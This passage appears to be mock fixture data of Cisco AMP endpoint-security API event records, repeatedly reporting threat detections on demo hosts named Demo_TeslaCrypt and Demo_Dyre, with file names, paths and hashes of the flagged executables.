Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196246","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196245","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228942","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":913000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228941","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":897000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228940","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":211000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228939","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228938","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8